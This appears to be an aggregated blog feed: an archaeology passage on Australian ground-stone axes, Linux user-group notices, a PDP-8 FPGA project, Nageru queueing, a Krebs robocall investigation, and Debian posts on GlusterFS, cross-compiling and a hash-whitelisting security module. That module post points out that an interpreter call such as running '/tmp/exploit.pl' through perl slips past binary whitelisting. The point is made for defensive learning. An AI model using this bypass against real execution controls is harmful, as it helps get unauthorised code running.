In Japan this technology is much older than elsewhere in the northern hemisphere, and ground-stone axes have been found dating to 30,000 years ago during the Japanese Palaeolithic period. Until recently these were thought to be the oldest examples of ground-stone technology in the world. However, in 2016, Australian archaeologists Peter Hiscock, Sue O’Connor, Jane Balme and Tim Maloney reported in an article in the journal Australian Archaeology, the finding of a tiny flake of stone (just over 1 cm long and 1/2 cm wide) from a ground stone axe in layers dated to 44,000 to 49,000 years ago at the site of Carpenter’s Gap in the Kimberley region of north-west Australia. This tiny flake of stone – easily missed by anyone not paying close attention – is an excellent example of the extreme importance of ‘archaeological context’. Archaeological material that remains in its original context (known as in situ) can be dated accurately and associated with other material from the same layers, thus allowing us to understand more about the material. Anything removed from the context usually can not be dated and only very limited information can be learnt.

The find from the Kimberley makes Australia the oldest place in the world to have ground-stone technology. The tiny chip of stone, broken off a larger ground-stone artefact, probably an axe, was made by the ancestors of Aboriginal people in the millennia after they arrived on this continent. These early Australians did not practise agriculture, but they did eat various grains, which they leaned to grind between stones to make flour. It is possible that whilst processing these grains they learned to grind stone tools as well. Our artefact, shown above, is undated. It was found, totally removed from its original context, stored under an old house in Brisbane. The artefact is useful as a teaching aid, allowing students to touch and hold a ground-stone axe made by Aboriginal people in Australia’s past. However, since it was removed from its original context at some point, we do not know how old it is, or even where it came from exactly.

Our artefact is a stone tool. Specifically, it is a ground stone axe, made using technology that dates back almost 50,000 years in Australia! These axes were usually made by rubbing a hard stone cobble against rocks by the side of a creek. Water from the creek was used as a lubricant, and often sand was added as an extra abrasive. The making of ground-stone axes often left long grooves in these rocks. These are called ‘grinding grooves’ and can still be found near some creeks in the landscape today, such as in Kuringai Chase National Park in Sydney. The ground-stone axes were usually hafted using sticks and lashings of plant fibre, to produce a tool that could be used for cutting vegetation or other uses. Other stone tools look different to the one shown above, especially those made by flaking stone; however, smooth stones should always be carefully examined in case they are also ground-stone artefacts and not just simple stones!

Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV Beginners July Meeting

Jul 15 2017 12:30
Jul 15 2017 16:30
Jul 15 2017 12:30
Jul 15 2017 16:30
Location: 
Infoxchange, 33 Elizabeth St. Richmond

Workshop to be announced.

There will also be the usual casual hands-on workshop, Linux installation, configuration and assistance and advice. Bring your laptop if you need help with a particular issue. This will now occur BEFORE the talks from 12:30 to 14:00. The talks will commence at 14:00 (2pm) so there is time for people to have lunch nearby.

The meeting will be held at Infoxchange, 33 Elizabeth St. Richmond 3121 (enter via the garage on Jonas St.) Late arrivals, please call (0421) 775 358 for access to the venue.

LUV would like to acknowledge Infoxchange for the venue.

Linux Users of Victoria Inc., is an incorporated association, registration number A0040056C.

July 15, 2017 - 12:30

Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV Main July 2017 Meeting

Jul 4 2017 18:30
Jul 4 2017 20:30
Jul 4 2017 18:30
Jul 4 2017 20:30
Location: 
The Dan O'Connell Hotel, 225 Canning Street, Carlton VIC 3053

PLEASE NOTE NEW LOCATION

Tuesday, July 4, 2017
6:30 PM to 8:30 PM
The Dan O'Connell Hotel
225 Canning Street, Carlton VIC 3053

Speakers:

• To be announced

Come have a drink with us and talk about Linux.  If you have something cool to show, please bring it along!

The Dan O'Connell Hotel, 225 Canning Street, Carlton VIC 3053

Food and drinks will be available on premises.

Before and/or after each meeting those who are interested are welcome to join other members for dinner.

Linux Users of Victoria Inc., is an incorporated association, registration number A0040056C.

July 4, 2017 - 18:30

Cory DoctorowAudio from my NYPL appearance with Edward Snowden


Last month, I appeared onstage with Edward Snowden at the NYPL, hosted by Paul Holdengraber, discussing my novel Walkaway. The library has just posted the audio! It was quite an evening

,

Cory DoctorowBruce Sterling reviews WALKAWAY

Bruce Sterling, Locus Magazine: Walkaway is a real-deal, generically traditional science-fiction novel; it’s set in an undated future and it features weird set design, odd costumes, fights, romances, narrow escapes, cool weapons, even zeppelins. This is the best Cory Doctorow book ever. I don’t know if it’s destined to become an SF classic, mostly because it’s so advanced and different that it makes the whole genre look archaic.

For instance: in a normal science fiction novel, an author pals up with scientists and popularizes what the real experts are doing. Not here, though. Cory Doctorow is such an Internet policy wonk that he’s ‘‘popularizing’’ issues that only he has ever thought about. Walkaway is mostly about advancing and demolishing potential political arguments that have never been made by anybody but him…

…Walkaway is what science fiction can look like under modern cultural conditions. It’s ‘‘relevant,’’ it’s full of tremulous urgency, it’s Occupy gone exponential. It’s a novel of polarized culture-war in which all the combatants fast-talk past each other while occasionally getting slaughtered by drones. It makes Ed Snowden look like the first robin in spring.

…The sci-fi awesome and the authentically political rarely mix successfully. Cory had an SF brainwave and decided to exploit a cool plot element: people get uploaded into AIs. People often get killed horribly in Walkaway, and the notion that the grim victims of political struggle might get a silicon afterlife makes their fate more conceptually interesting. The concept’s handled brilliantly, too: these are the best portrayals of people-as-software that I’ve ever seen. They make previous disembodied AI brains look like glass jars from 1950s B-movies. That’s seduc­tively interesting for a professional who wants to mutate the genre’s tropes, but it disturbs the book’s moral gravity. The concept makes death and suffering silly.

…I’m not worried about Cory’s literary fate. I’ve read a whole lot of science fiction novels. Few are so demanding and thought-provoking that I have to abandon the text and go for a long walk.

I won’t say there’s nothing else like Walkaway, because there have been some other books like it, but most of them started mass movements or attracted strange cults. There seems to be a whole lot of that activity going on nowadays. After this book, there’s gonna be more.

Planet DebianAndreas Bombe: PDP-8/e Replicated — Introduction

I am creating a replica of the DEC PDP-8/e architecture in an FPGA from schematics of the original hardware. So how did I end up with a project like this?

The story begins with me wanting to have a computer with one of those front panels that have many, many lights where you can really see, in real time, what the computer is doing while it is executing code. Not because I am nostalgic for a prior experience with any of those — I was born a bit too late for that and my first computer as a kid was a Commodore 64.

Now, the front panel era ended around 40 years ago with the advent of microprocessors and computers of that age and older that are complete and working are hard to find and not cheap. And even if you do, there’s the issue of weight, size (complete systems with peripherals fill at least a rack) and power consumption. So what to do — build myself a small one with modern technology of course.

While there’s many computer architectures of that era to choose from, the various PDP machines by DEC are significant and well known (and documented) due to their large numbers. The most important are probably the 12 bit PDP-8, the 16 bit PDP-11 and the 36 bit PDP-10. While the PDP-11 is enticing because of the possibility to run UNIX I wanted to start with something simpler, so I chose the PDP-8.

My implementation on display next to a real PDP-8/e at VCFe 18.0

My implementation on display next to a real PDP-8/e at VCFe 18.0

The Original

DEC started the PDP-8 line of computers programmed data processors designed as low cost machines in 1965. It is a quite minimalist 12 bit architecture based on the earlier PDP-5, and by minimalist I mean seriously minimal. If you are familiar with early 8 bit microprocessors like the 6502 or 8080 you will find them luxuriously equipped in comparison.

The PDP-8 base architecture has a program counter (PC) and an accumulator (AC)1. That’s it. There are no pointer or index registers2. There is no stack. It has addition and AND instructions but subtractions and OR operations have to be manually coded. The optional Extended Arithmetic Element adds the MQ register but that’s really it for visible registers. The Wikipedia page on the PDP-8 has a good detailed description.

Regarding technology, the PDP-8 series has been in production long enough to get the whole range of implementations from discrete transistor logic to microprocessors. The 8/e which I target was right in the middle, implemented in TTL logic where each IC contains multiple logic elements. This allowed the CPU itself (including timing generator) to fit on three large circuit boards plugged into a backplane. Complete systems would have at least another board for the front panel and multiple boards for the core memory, then additional boards for whatever options and peripherals were desired.

Design Choices and Comparisons

I’m not the only one who had the idea to build something like that, of course. Among the other modern PDP-8 implementations with a front panel, probably the most prominent project is the Spare Time Gizmos SBC6120 which is a PDP-8 single board computer built around the Harris/Intersil HD-6120 microprocessor, which implementes the PDP-8 architecture, combined with a nice front panel. Another is the PiDP-8/I, which is another nice front panel (modeled after the 8/i which has even more lights) driven by the simh simulator running under Linux on a Raspberry Pi.

My goal is to get front panel lights that appear exactly like the real ones in operation. This necessitates driving the lights at full speed as they change with every instruction or even within instructions for some display selections. For example, if you run a tight loop that does nothing but increment AC while displaying that register, it would appear that all lights are lit at equal but less than full brightness. The reason is that the loop runs at such a high speed that even the most significant bit, which is blinking the slowest, is too fast to see flicker. Hence they are all effectively 50% on, just at different frequencies, and appear to be constantly light at the same brightness.

This is where the other projects lack what I am looking for. The PiDP-8/I is a multiplexed display which updates at something like 30 Hz or 60 Hz, taking whatever value is current in the simulation software at the time. All the states the lights took inbetween are lost and consequently there is flickering where there shouldn’t be. On the SBC6120 at least the address lines appear to update at full speed as these are the actual RAM address lines. However the used 6120 microprocessor does not have required data for the indicator display externally available. Instead, the SBC6120 runs an interrupt at 30 Hz to trap into its firmware/monitor program which then reads the current state and writes it to the front panel display, which is essentially just another peripheral. A different considerable problem with the SBC6120 is its use of the 6100 microprocessor family ICs, which are themselves long out of production and not trivial (or cheaply) to come by.

Given that the way to go is to drive all lights in step with every cycle3, this can be done by a software running on a dedicated microcontroller — which is how I started — or by implementing a real CPU with all the needed outputs in an FPGA — which is the project I am writing about.

In the next post I will give on overview of the hardware I built so far and some of the features that are yet to be implemented.


  1. With an associated link bit which is a little different from a carry bit in that it is treated as a thirteenth bit, i.e. it will be flipped rather than set when a carry occurs. [return]
  2. Although there are 8 specially treated memory addresses that will pre-increment when used in indirect addressing. [return]
  3. Basic cycles on the PDP-8/e are 1.4 µs for memory modifying cycles and fast cycles of 1.2 µs for everything else. Instructions can be one to three cycles long. [return]

Planet DebianSteinar H. Gunderson: Frame queue management in Nageru 1.6.1

Nageru 1.6.1 is on its way, and what was intended to only be a release centered around monitoring improvements (more specifically a full set of native Prometheus] metrics) actually ended up getting a fairly substantial change to how Nageru manages its frame queues. To understand what's changing and why, it's useful to first understand the history of Nageru's queue management. Nageru 1.0.0 started out with a fairly simple scheme, but with some basics that are still relevant today: One of the input cards was deemed the master card, and whenever it delivers a frame, the master clock ticks and an output frame is produced. (There are some subtleties about dropped frames and/or the master card changing frame rates, but I'm going to ignore them, since they're not important to the discussion.)

To this end, every card keeps a preallocated frame queue; when a card delivers a frame, it's put into the queue, and when the master clock ticks, it tries picking out one frame from each of the other card's queues to mix together. Note that “mix” here could be as simple as picking one input and throwing all the other ones away; the queueing algorithm doesn't care, it just feeds all of them to the theme and lets that run whatever GPU code it needs to match the user's preferences.

The only thing that really keeps the queues bounded is that the frames in them are preallocated (in GPU memory), so if one queue gets longer than 16 frames, Nageru starts dropping it. But is 16 the right number? There are two conflicting demands here, ignoring memory usage:

  • You want to keep the latency down.
  • You don't want to run out of frames in the queue if you can avoid it; if you drop too aggressively, you could find yourself at the next frame with nothing in the queue, because the input card hasn't delivered it yet when the master card ticks. (You could argue one should delay the output in this case, but for how long? And if you're using HDMI/SDI output, you have no such luxury.)

The 1.0.0 scheme does about as well as one could possibly hope in never dropping frames, but unfortunately, it can be pretty poor at latency. For instance, if your master card runs at 50 Hz and you have a 60 Hz card, the latter will eventually build up a delay of 16 * 16.7 ms = 266.7 ms—clearly unacceptable, and rather unneeded.

You could ask the user to specify a queue length, but the user probably doesn't know, and also shouldn't really have to care—more knobs to twiddle are a bad thing, and even more so knobs the user is expected to twiddle. Thus, Nageru 1.2.0 introduced queue autotuning; it keeps a running estimate on how big the queue needs to be to avoid underruns, simply based on experience. If we've been dropping frames on a queue and then there's an underrun, the “safe queue length” is increased by one, and if the queue has been having excess frames for more than a thousand successive master clock ticks, we reduce it by one again. Whenever the queue has more than this “safe” number, we drop frames.

This was simple, effective and largely fixed the problem. However, when adding metrics, I noticed a peculiar effect: Not all of my devices have equally good clocks. In particular, when setting up for 1080p50, my output card's internal clock (which assumes the role of the master clock when using HDMI/SDI output) seems to tick at about 49.9998 Hz, and my simple home camcorder delivers frames at about 49.9995 Hz. Over the course of an hour, this means it produces one more frame than you should have… which should of course be dropped. Having an SDI setup with synchronized clocks (blackburst/tri-level) would of course fix this problem, but most people are not so lucky with their cameras, not to mention the price of PC graphics cards with SDI outputs!

However, this happens very slowly, which means that for a significant amount of time, the two clocks will very nearly be in sync, and thus racing. Who ticks first is determined largely by luck in the jitter (normal is maybe 1ms, but occasionally, you'll see delayed delivery of as much as 10 ms), and this means that the “1000 frames” estimate is likely to be thrown off, and the result is hundreds of dropped frames and underruns in that period. Once the clocks have diverged enough again, you're off the hook, but again, this isn't a good place to be.

Thus, Nageru 1.6.1 change the algorithm around yet again, by incorporating more data to build an explicit jitter model. 1.5.0 was already timestamping each frame to be able to measure end-to-end latency precisely (now also exposed in Prometheus metrics), but from 1.6.1, they are actually used in the queueing algorithm. I ran several eight- to twelve-hour tests and simply stored all the event arrivals to a file, and then simulated a few different algorithms (including the old algorithm) to see how they fared in measures such as latency and number of drops/underruns.

I won't go into the full details of the new queueing algorithm (see the commit if you're interested), but the gist is: Based on the last 5000 frames, it tries to estimate the maximum possible jitter for each input (ie., how late the frame could possibly be). Based on this as well as clock offsets, it determines whether it's really sure that there will be an input frame available on the next master tick even if it drops the queue, and then trims the queue to fit.

The result is pretty satisfying; here's the end-to-end latency of my camera being sent through to the SDI output:

As you can see, the latency goes up, up, up until Nageru figures it's now safe to drop a frame, and then does it in one clean drop event; no more hundreds on drops involved. There are very late frame arrivals involved in this run—two extra frame drops, to be precise—but the algorithm simply determines immediately that they are outliers, and drops them without letting them linger in the queue. (Immediate dropping is usually preferred to sticking around for a bit and then dropping it later, as it means you only get one disturbance event in your stream as opposed to two. Of course, you can only do it if you're reasonably sure it won't lead to more underruns later.)

Nageru 1.6.1 will ship before Solskogen, as I intend to run it there :-) And there will probably be lovely premade Grafana dashboards from the Prometheus data. Although it would have been a lot nicer if Grafana were more packaging-friendly, so I could pick it up from stock Debian and run it on armhf. Hrmf. :-)

Krebs on SecurityGot Robocalled? Don’t Get Mad; Get Busy.

Several times a week my cell phone receives the telephonic equivalent of spam: A robocall. On each occasion the call seems to come from a local number, but when I answer there is that telltale pause followed by an automated voice pitching some product or service. So when I heard from a reader who chose to hang on the line and see where one of these robocalls led him, I decided to dig deeper. This is the story of that investigation. Hopefully, it will inspire readers to do their own digging and help bury this annoying and intrusive practice.

robocallThe reader — Cedric (he asked to keep his last name out of this story) had grown increasingly aggravated with the calls as well, until one day he opted to play along by telling a white lie to the automated voice response system that called him: Yes, he said, yes he definitely was interested in credit repair services.

“I lied about my name and played like I needed credit repair to buy a home,” Cedric said. “I eventually wound up speaking with a representative at creditfix.com.”

The number that called Cedric — 314-754-0123 — was not in service when Cedric tried it back, suggesting it had been spoofed to make it look like it was coming from his local area. However, pivoting off of creditfix.com opened up some useful avenues of investigation.

Creditfix is hosted on a server at the Internet address 208.95.62.8. According to records maintained by Farsight Security — a company that tracks which Internet addresses correspond to which domain names — that server hosts or recently hosted dozens of other Web sites (the full list is here).

Most of these domains appear tied to various credit repair services owned or run by a guy named Michael LaSala and registered to a mail drop in Las Vegas. Looking closer at who owns the 208.95.62.8 address, we find it is registered to System Admin, LLC, a Florida company that lists LaSala as a manager, according to a lookup at the Florida Secretary of State’s office.

An Internet search for the company’s address turns up a filing by System Admin LLC with the U.S. Federal Communications Commission (FCC). That filing shows that the CEO of System Admin is Martin Toha, an entrepreneur probably best known for founding voip.com, a voice-over-IP (VOIP) service that allows customers to make telephone calls over the Internet.

Emails to the contact address at Creditfix.com elicited a response from a Sean in Creditfix’s compliance department. Sean told KrebsOnSecurity that mine was the second complaint his company had received about robocalls. Sean said he was convinced that his employer was scammed by a lead generation company that is using robocalls to quickly and illegally gin up referrals, which generate commissions for the lead generation firm.

Creditfix said the robocall leads it received appear to have been referred by Little Brook Media, a marketing firm in New York City. Little Brook Media did not respond to multiple requests for comment.

Robocalls are permitted for political candidates, but beyond that if the recording is a sales message and you haven’t given your written permission to get calls from the company on the other end, the call is illegal. According to the Federal Trade Commission (FTC), companies are using auto-dialers to send out thousands of phone calls every minute for an incredibly low cost.

“The companies that use this technology don’t bother to screen for numbers on the national Do Not Call Registry,” the FTC notes in an advisory on its site. “If a company doesn’t care about obeying the law, you can be sure they’re trying to scam you.”

Mr. Toha confirmed that Creditfix was one of his clients, but said none of his clients want leads from robocalls for that very reason. Toha said the problem is that many companies buy marketing leads but don’t always know where those leads come from or how they are procured.

“A lot of times clients don’t know the companies that the ad agency or marketing agency works with,” Toha said. “You submit yourself as a publisher to a network of publishers, and what they do is provide calls to marketers.”

Robby Birnbaum is a debt relief attorney in Florida and president of the National Association of Credit Services Organizations. Birnbaum said no company wants to buy leads from robocalls, and that marketers who fabricate leads this way are not in business for long.

But he said those that end up buying leads from robocall marketers are often smaller mom-and-pop debt relief shops, and that these companies soon find themselves being sued by what Birnbaum called “frequent filers,” lawyers who make a living suing companies for violating laws against robocalls.

“It’s been a problem in this industry for a while, but robocalls affect every single business that wants to reach consumers,” Birnbaum said. He noted that the best practice is for companies to require lead generators to append to each customer file information about how and from where the lead was generated.

“A lot of these lead companies will not provide that, and when my clients insist on it, those companies have plenty of other customers who will buy those leads,” Birnbaum said. “The phone companies can block many of these robocalls, but they don’t.”

That may be about to change. The FCC recently approved new rules that would let phone companies block robocallers from using numbers they aren’t supposed to be using.

“If a robocaller decides to spoof another phone number — making it appear that they’re calling from a different line to hide their identity — phone providers would be able to block them if they use a number that clearly can’t exist because it hasn’t been assigned or that an existing subscriber has asked not to have spoofed,” reads a story at The Verge.

The FCC estimates that there are more than 2.4 billion robocalls made every month, or roughly seven calls per person per month. The FTC received nearly 3.5 million robocall complaints in fiscal year 2016, an increase of 60 percent from the year prior.

The newest trend in robocalls is the “ringless voicemail,” in which the marketing pitch lands directly in your voicemail inbox without ringing the phone. The FCC also is considering new rules to prohibit ringless voicemails.

Readers may be able to avoid some marketing calls by registering their mobile number with the Do Not Call registry, but the list appears to do little to deter robocallers. If and when you do receive robocalls, consider reporting them to the FTC.

Some wireless providers now offer additional services and features to help block automated calls. For example, AT&T offers wireless customers its free Call Protect app, which screens incoming calls and flags those that are likely spam calls. See the FCC’s robocall resource page for links to resources at your mobile provider.

In addition, there are a number of third-party mobile apps designed to block spammy calls, such as Nomorobo and TrueCaller.

Update, June 27, 2017, 3:04 p.m. ET: Corrected spelling of Michael LaSala.

Planet DebianLars Wirzenius: Obnam 1.22 released (backup application)

I've just released version 1.22 of Obnam, my backup application. It is the first release for this year. Packages are available on code.liw.fi/debian and in Debian unstable, and source is in git. A summary of the user-visible changes is below.

For those interested in living dangerously and accidentally on purpose deleting all their data, the link below shows that status and roadmap for FORMAT GREEN ALBATROSS. http://distix.obnam.org/obnam-dev/182bd772889544d5867e1a0ce4e76652.html

Version 1.22, released 2017-06-25

  • Lars Wirzenius made Obnam log the full text of an Obnam exception/error message with more than one line. In particular this applies to encryption error messages, which now log the gpg output.

  • Lars Wirzenius made obnam restore require absolute paths for files to be restored.

  • Lars Wirzenius made obnam forget use a little less memory. The amount depends on the number of genrations and the chunks they refer to.

  • Jan Niggemann updated the German translation of the Obnam manual to match recent changes in the English version.

  • SanskritFritz and Ian Cambell fixed the kdirstat plugin.

  • Lars Wirzenius changed Obnam to hide a Python stack trace when there's a problem with the SSH connection (e.g., failure to authenticate, or existing connection breaks).

  • Lars Wirzenius made the Green Albatross version of obnam forget actually free chunks that are no longer used.

Planet DebianShirish Agarwal: Dreams don’t cost a penny, mumma’s boy :)

This one I promise will be short 🙂

After the last two updates, I thought it was time for something positive to share. While I’m doing the hard work (of physiotherapy which is gruelling), the only luxury I have nowadays is of falling on to dreams which are also rare. The dream I’m going to share is totally unrealistic as my mum hates travel but I’m sure many sons and daughters would identify with it. Almost all travel outside of relatives is because I dragged her onto it.

In the dream, I am going to a Debconf, get bursary and the conference is being held somewhere in Europe, maybe Paris (2019 probably) 🙂 . I reach and attend the conference, present and generally have a great time sharing and learning from my peers. As we all do in these uncertain times, I too phone home every couple of days ensuring her that I’m well and in best of health. The weather is mild like it was in South Africa and this time I had come packed with woollens so all was well.

Just the day before the conference is to end, I call up mum and she tells about a specific hotel/hostel which I should check out. I am somewhat surprised that she knows of a specific hotel/hostel in a specific place but I accede to her request. I go there to find a small, quiet, quaint bed & breakfast place (dunno if Paris has such kind of places), something which my mum would like. Intuitively, I ask at the reception to look in the register. After seeing my passport, he too accedes to my request and shows me the logbook of all visitors registering to come in the last few days (for some reason privacy is not a concern then) . I am surprised to find my mother’s name in the register and she had turned up just a day or two before.

I again request the reception to be able to go to room abcd without being announced and have some sort of key (like for maintenance or laundry as an excuse) . The reception calls the manager and after looking copy of mother’s passport and mine they somehow accede to the request with help located nearby just in case something goes wrong.

I disguise my voice and announce as either Room service or Maintenance and we are both surprised and elated to see each other. After talking a while, I go back to the reception and register myself as her guest.

The next week is a whirlwind as I come to know of hop-on, hop-off buses similar service in Paris as was in South Africa. I buy a small booklet and we go through all the museums. the vineyards or whatever it is that Paris has to offer. IIRC there is also a lock and key on a famous bridge. We also do that. She is constantly surprised at the different activities the city shows her and the mother-son bond becomes much better.

I had shared the same dream with her and she laughed. In reality, she is happy and comfortable in the confines of her home.

Still I hope some mother-daughter, son-father, son-mother or any combination of parent, sibling takes this entry and enrich each other by travelling together.


Filed under: Miscellenous Tagged: #dream, #mother, #planet-debian, travel

,

Planet DebianLisandro Damián Nicanor Pérez Meyer: Qt 5.7 submodules that didn't make it to Stretch but will be in testing

There are two Qt 5.7 submodules that we could not package in time for Strech but are/will be available in their 5.7 versions in testing. This are qtdeclarative-render2d-plugin and qtvirtualkeyboard.

declarative-render2d-plugin makes use of the Raster paint engine instead of OpenGL to render the  contents of a scene graph, thus making it useful when Qt Quick2 applications  are run in a system without OpenGL 2  enabled hardware. Using it might require tweaking Debian's /etc/X11/Xsession.d/90qt5-opengl. On Qt 5.9 and newer this plugin is merged in Qt GUI so there should be no need to perform any action on the user's behalf.

Debian's VirtualKeyboard currently has a gotcha: we are not building it with the embedded code it ships. Upstream ships 3rd party code but lacks a way to detect and use the system versions of them. See QTBUG-59594, patches are welcomed. Please note that we prefer patches sent directly upstream to the current dev revision, we will be happy to backport patches if necessary.
Yes, this means no hunspell, openwnn, pinyin, tcime nor lipi-toolkit/t9write support.


Planet DebianSteve Kemp: Linux security modules, round two.

So recently I wrote a Linux Security Module (LSM) which would deny execution of commands, unless an extended attribute existed upon the filesystem belonging to the executables.

The whitelist-LSM worked well, but it soon became apparent that it was a little pointless. Most security changes are pointless unless you define what you're defending against - your "threat model".

In my case it was written largely as a learning experience, but also because I figured it seemed like it could be useful. However it wasn't actually as useful because you soon realize that you have to whitelist too much:

  • The redis-server binary must be executable, to the redis-user, otherwise it won't run.
  • /usr/bin/git must be executable to the git user.

In short there comes a point where user alice must run executable blah. If alice can run it, then so can mallory. At which point you realize the exercise is not so useful.

Taking a step back I realized that what I wanted to to prevent was the execution of unknown/unexpected, and malicious binaries How do you identify known-good binaries? Well hashes & checksums are good. So for my second attempt I figured I'd not look for a mere "flag" on a binary, instead look for a valid hash.

Now my second LSM is invoked for every binary that is executed by a user:

  • When a binary is executed the sha1 hash is calculated of the files contents.
  • If that matches the value stored in an extended attribute the execution is permitted.
    • If the extended-attribute is missing, or the checksum doesn't match, then the execution is denied.

In practice this is the same behaviour as the previous LSM - a binary is either executable, because there is a good hash, or it is not, because it is missing or bogus. If somebody deploys a binary rootkit this will definitely stop it from executing, but of course there is a huge hole - scripting-languages:

  • If /usr/bin/perl is whitelisted then /usr/bin/perl /tmp/exploit.pl will succeed.
  • If /usr/bin/python is whitelisted then the same applies.

Despite that the project was worthwhile, I can clearly describe what it is designed to achieve ("Deny the execution of unknown binaries", and "Deny binaries that have been modified"), and I learned how to hash a file from kernel-space - which was surprisingly simple.

(Yes I know about IMA and EVM - this was a simple project for learning purposes. Public-key signatures will be something I'll look at next/soon/later. :)

Perhaps the only other thing to explore is the complexity in allowing/denying actions based on the user - in a human-readable fashion, not via UIDs. So www-data can execute some programs, alice can run a different set of binaries, and git can only run /usr/bin/git.

Of course down that path lies apparmour, selinux, and madness..

Planet DebianIngo Juergensmann: Upgrade to Debian Stretch - GlusterFS fails to mount

Before I upgrade from Jessie to Stretch everything worked as a charme with glusterfs in Debian. But after I upgraded the first VM to Debian Stretch I discovered that glusterfs-client was unable to mount the storage on Jessie servers. I got this in glusterfs log:

[2017-06-24 12:51:53.240389] I [MSGID: 100030] [glusterfsd.c:2454:main] 0-/usr/sbin/glusterfs: Started running /usr/sbin/glusterfs version 3.8.8 (args: /usr/sbin/glusterfs --read-only --fuse-mountopts=nodev,noexec --volfile-server=192.168.254.254 --volfile-id=/le --fuse-mountopts=nodev,noexec /etc/letsencrypt.sh/certs)
[2017-06-24 12:51:54.534826] E [mount.c:318:fuse_mount_sys] 0-glusterfs-fuse: ret = -1

[2017-06-24 12:51:54.534896] I [mount.c:365:gf_fuse_mount] 0-glusterfs-fuse: direct mount failed (Invalid argument) errno 22, retry to mount via fusermount
[2017-06-24 12:51:56.668254] I [MSGID: 101190] [event-epoll.c:628:event_dispatch_epoll_worker] 0-epoll: Started thread with index 1
[2017-06-24 12:51:56.671649] E [glusterfsd-mgmt.c:1590:mgmt_getspec_cbk] 0-glusterfs: failed to get the 'volume file' from server
[2017-06-24 12:51:56.671669] E [glusterfsd-mgmt.c:1690:mgmt_getspec_cbk] 0-mgmt: failed to fetch volume file (key:/le)
[2017-06-24 12:51:57.014502] W [glusterfsd.c:1327:cleanup_and_exit] (-->/usr/lib/x86_64-linux-gnu/libgfrpc.so.0(rpc_clnt_handle_reply+0x90) [0x7fbea36c4a20] -->/usr/sbin/glusterfs(mgmt_getspec_cbk+0x494) [0x55fbbaed06f4] -->/usr/sbin/glusterfs(cleanup_and_exit+0x54) [0x55fbbaeca444] ) 0-: received signum (0), shutting down
[2017-06-24 12:51:57.014564] I [fuse-bridge.c:5794:fini] 0-fuse: Unmounting '/etc/letsencrypt.sh/certs'.
[2017-06-24 16:44:45.501056] I [MSGID: 100030] [glusterfsd.c:2454:main] 0-/usr/sbin/glusterfs: Started running /usr/sbin/glusterfs version 3.8.8 (args: /usr/sbin/glusterfs --read-only --fuse-mountopts=nodev,noexec --volfile-server=192.168.254.254 --volfile-id=/le --fuse-mountopts=nodev,noexec /etc/letsencrypt.sh/certs)
[2017-06-24 16:44:45.504038] E [mount.c:318:fuse_mount_sys] 0-glusterfs-fuse: ret = -1

[2017-06-24 16:44:45.504084] I [mount.c:365:gf_fuse_mount] 0-glusterfs-fuse: direct mount failed (Invalid argument) errno 22, retry to mount via fusermount

After some searches on the Internet I found Debian #858495, but no solution for my problem. Some search results recommended to set "option rpc-auth-allow-insecure on", but this didn't help. In the end I joined #gluster on Freenode and got some hints there:

JoeJulian | ij__: debian breaks apart ipv4 and ipv6. You'll need to remove the ipv6 ::1 address from localhost in /etc/hosts or recombine your ip stack (it's a sysctl thing)
JoeJulian | It has to do with the decisions made by the debian distro designers. All debian versions should have that problem. (yes, server side).

Removing ::1 from /etc/hosts and from lo interface did the trick and I could mount glusterfs storage from Jessie servers in my Stretch VMs again. However, when I upgraded the glusterfs storages to Stretch as well, this "workaround" didn't work anymore. Some more searching on the Internet made me found this posting on glusterfs mailing list:

We had seen a similar issue and Rajesh has provided a detailed explanation on why at [1]. I'd suggest you to not to change glusterd.vol but execute "gluster volume set <volname> transport.address-family inet" to allow Gluster to listen on IPv4 by default.

Setting this option instantly fixed my issues with mounting glusterfs storages.

So, whatever is wrong with glusterfs in Debian, it seems to have something to do with IPv4 and IPv6. When disabling IPv6 in glusterfs, it works. I added information to #858495.

Kategorie: 
 

Planet DebianRiku Voipio: Cross-compiling with debian stretch

Debian stretch comes with cross-compiler packages for selected architectures:
 $ apt-cache search cross-build-essential
crossbuild-essential-arm64 - Informational list of cross-build-essential packages for
crossbuild-essential-armel - ...
crossbuild-essential-armhf - ...
crossbuild-essential-mipsel - ...
crossbuild-essential-powerpc - ...
crossbuild-essential-ppc64el - ...

Lets have a quick exact steps guide. But first - while you can use do all this in your desktop PC rootfs, it is more wise to contain yourself. Fortunately, Debian comes with a container tool out of box:

sudo debootstrap stretch /var/lib/container/stretch http://deb.debian.org/debian
echo "strech_cross" | sudo tee /var/lib/container/stretch/etc/debian_chroot
sudo systemd-nspawn -D /var/lib/container/stretch
Then we set up cross-building enviroment for arm64 inside the container:

# Tell dpkg we can install arm64
dpkg --add-architecture arm64
# Add src line to make "apt-get source" work
echo "deb-src http://deb.debian.org/debian stretch main" >> /etc/apt/sources.list
apt-get update
# Install cross-compiler and other essential build tools
apt install --no-install-recommends build-essential crossbuild-essential-arm64
Now we have a nice build enviroment, lets choose something more complicated than the usual kernel/BusyBox to cross-build, qemu:

# Get qemu sources from debian
apt-get source qemu
cd qemu-*
# New in stretch: build-dep works in unpacked source tree
apt-get build-dep -a arm64 .
# Cross-build Qemu for arm64
dpkg-buildpackage -aarm64 -j6 -b
Now that works perfectly for Qemu. For other packages, challenges may appear. For example you may have to se "nocheck" flag to skip build-time unit tests. Or some of the build-dependencies may not be multiarch-enabled. So work continues :)

CryptogramAmazon Patents Measures to Prevent In-Store Comparison Shopping

Amazon has been issued a patent on security measures that prevents people from comparison shopping while in the store. It's not a particularly sophisticated patent -- it basically detects when you're using the in-store Wi-Fi to visit a competitor's site and then blocks access -- but it is an indication of how retail has changed in recent years.

What's interesting is that Amazon is on the other side of this arms race. As an on-line retailer, it wants people to walk into stores and then comparison shop on its site. Yes, I know it's buying Whole Foods, but it's still predominantly an online retailer. Maybe it patented this to prevent stores from implementing the technology.

It's probably not nearly that strategic. It's hard to build a business strategy around a security measure that can be defeated with cellular access.

Planet Linux AustraliaLev Lafayette: Duolingo Plus is Extremely Broken

After using Duolingo for over a year and accumulating almost 100,000 points I thought it would do the right thing and pay for the Plus service. It was exactly the right time as I would be travelling overseas and the ability to do lessons offline and have them sync later seemed ideal.

For the first few days it seemed to be operating fine; I had downloaded the German tree and was working my way through it. Then I downloaded the French tree, and several problems started to emerge.

read more

Planet DebianNorbert Preining: Calibre 3 for Debian

I have updated my Calibre Debian repository to include packages of the current Calibre 3.1.1. As with the previous packages, I kept RAR support in to allow me to read comic books. I also have forwarded my changes to the maintainer of Calibre in Debian so maybe we will have soon official packages, too.

The repository location hasn’t changed, see below.

